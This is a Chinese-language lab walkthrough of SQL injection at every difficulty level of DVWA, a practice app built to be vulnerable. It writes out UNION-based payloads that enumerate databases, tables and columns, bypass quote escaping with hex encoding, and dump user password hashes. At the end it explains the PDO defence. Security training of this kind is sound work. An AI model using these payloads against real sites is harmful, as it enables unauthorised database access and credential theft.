DVWA全级别之SQL Injection(SQL注入)

DVWA全级别之SQL Injection注入

 

DVWA简介

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

DVWA共有十个模块,分别是

Brute Force(暴力(破解))

Command Injection(命令行注入)

CSRF(跨站请求伪造)

File Inclusion(文件包含)

File Upload(文件上传)

Insecure CAPTCHA (不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

XSS(Stored)(存储型跨站脚本)

今天我们来学习SQL Injection(SQL注入)

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

手工注入非盲注步骤分析

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.下载数据

Low

首先打开dvwa,将等级改为low;

DVWA全级别之SQL Injection(SQL注入)

查看服务器端核心代码

 DVWA全级别之SQL Injection(SQL注入)

可以看到,Low级别的代码对来自客户端的参数id没有进行任何的检查与过滤,存在明显的SQL注入。

判断是否存在注入,注入是字符型还是数字型

输入1 查询成功;

DVWA全级别之SQL Injection(SQL注入)

输入1’ and  ‘1’=’2  查询失败,返回结果为空;

DVWA全级别之SQL Injection(SQL注入)

猜解SQL查询语句中的字段数,输入:1' or 1=1 order by #  查询成功;

DVWA全级别之SQL Injection(SQL注入)

1' or 1=1 order by 2#  查询成功;

DVWA全级别之SQL Injection(SQL注入)

1' or 1=1 order by 3#  查询失败;

DVWA全级别之SQL Injection(SQL注入)

说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。(这里也可以通过输入union select 1,2,3…来猜解字段数)

确定显示的字段顺序输入1′ union select 1,2 #,查询成功

DVWA全级别之SQL Injection(SQL注入)

说明执行的SQL语句为select First name,Surname from 表 where ID=’id’…

获取当前数据库,输入 1' union select 1,database() #  查询成功,当前数据库为dvwa;

DVWA全级别之SQL Injection(SQL注入)

获取数据库中的表,输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

DVWA全级别之SQL Injection(SQL注入)

获取表中的字段名,输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' #

DVWA全级别之SQL Injection(SQL注入)

查询users表中所有用户的数据,输入1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

DVWA全级别之SQL Injection(SQL注入)

Medium

中级加入了一些防御,不让用户输入,只提供选择(可用burpsuit抓包来绕过)

查看服务器端核心代码;

DVWA全级别之SQL Injection(SQL注入)

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号

\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

DVWA全级别之SQL Injection(SQL注入)

通过burpsuit抓包,修改数据包,绕过防御。判断注入点,以及注入的类型;

输入 1 and 1=1# 查询,存在数字型注入;

DVWA全级别之SQL Injection(SQL注入)

猜解SQL查询语句中的字段数, 抓包更改参数id为 1 order by 2#  查询成功;

DVWA全级别之SQL Injection(SQL注入)

抓包更改参数id为 1 order by 3#   查询失败,说明查询语句中只有两个字段;

DVWA全级别之SQL Injection(SQL注入)

确定显示的字段顺序,抓包更改参数id为1 union select 1,2 # 查询成功;

DVWA全级别之SQL Injection(SQL注入)

获取当前数据库,抓包更改参数id为1 union select 1,database() #,查询成功;

DVWA全级别之SQL Injection(SQL注入)

获取数据库中的表,1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #查询成功;

DVWA全级别之SQL Injection(SQL注入)

获取表中的字段名,1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#  查询失败;

DVWA全级别之SQL Injection(SQL注入)

这是因为单引号被转义了,变成了\’。

可以利用16进制进行绕过,抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #,查询成功:

DVWA全级别之SQL Injection(SQL注入)

下载数据,抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功;

DVWA全级别之SQL Injection(SQL注入)

High

查看服务器端核心代码,

DVWA全级别之SQL Injection(SQL注入)

可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样,直接进行最后一步下载数据。

输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功;

DVWA全级别之SQL Injection(SQL注入)

DVWA全级别之SQL Injection(SQL注入)

High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。

Impossible

查看服务器端核心代码,

DVWA全级别之SQL Injection(SQL注入)

可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

上一篇:python实现HTTP代理的思路和Demo


下一篇:Fortify漏洞之Sql Injection(sql注入)